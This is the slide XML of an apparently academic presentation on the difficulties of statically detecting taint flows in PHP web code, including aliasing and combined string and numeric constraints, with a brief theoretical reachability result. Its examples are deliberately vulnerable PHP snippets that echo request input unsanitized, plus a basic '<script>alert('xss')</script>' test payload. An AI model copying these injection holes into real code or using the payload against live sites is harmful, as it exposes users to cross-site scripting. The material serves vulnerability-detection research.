          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Strings and numerical quantities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Interactions between client-side code, server-side code, databases, and system configurations</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Variation in browser and server behaviors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 PHP, aliases may be introduced by using the reference operator “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>”.</a:t>
            </a:r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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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Challenges: Alias Analysis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285720" y="2786058"/>
            <a:ext cx="4500594" cy="25853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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $a=“test”;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a: untainted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$b=&amp;$a;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//  $a, $b: untainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $a= $_GET[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”];  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a ,$b: tainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   echo $b;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// XSS vulnerability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285722" y="2416726"/>
            <a:ext cx="1500198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PHP Code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4988966" y="2416726"/>
            <a:ext cx="1440423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PHP Code</a:t>
            </a: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5000628" y="2786058"/>
            <a:ext cx="3857652" cy="25853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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$a="test";     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a: untainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$b=&amp;$a;        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a, $b: untainted  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>grade();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function grade()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$a=$_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a , $b: tainted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo $b;   ?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// XSS vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34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14283" y="5429266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/>
              <a:t>Tool A: false negative </a:t>
            </a:r>
          </a:p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/>
              <a:t>Tool B: true positive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4929191" y="5429266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/>
              <a:t>Tool A:  false negative </a:t>
            </a:r>
          </a:p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/>
              <a:t>Tool B:  false negative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214282" y="6162281"/>
            <a:ext cx="857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/>
              <a:t>Note: Tool A and Tool B are two popular commercial code analysis tools.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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None of the existing tools (that we have tested) handles aliases between objects. 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Challenges: Alias Analysis (cont.)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2440524" y="2786058"/>
            <a:ext cx="3357586" cy="35394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Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>class car{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> $color;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($c){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    $this-&gt;color = $c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new car;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("blue");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a_mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = &amp;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a_mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( "&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>')&lt;/script&gt;“);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;color."&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;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2428860" y="2416726"/>
            <a:ext cx="1654737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PHP Code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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8109" y="5286388"/>
            <a:ext cx="1309687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Challenges: Strings and Numbers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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To exploit the XSS vulnerability at line 8, we have to generate input strings satisfying the conditions at lines 1, 2, and 7, which involve both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> constraints.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857224" y="1214424"/>
            <a:ext cx="757242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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1  if($_GET[‘mode’] == "add"){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2     if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’]) || !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($_GET[‘poster’])){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3          exit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = $_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_poster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = $_GET[‘poster’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7      if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) &gt; 100 &amp;&amp; !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ereg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script",$my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8          echo "Thank you for posting the message $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>11  …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Challenges: A Theoretical Limitation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Consider the class of programs with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Assignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sequencing, conditional branch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>At least three string variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>String concatenation (or even just appending a symbol to a string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Equality testing between two string variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reachability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
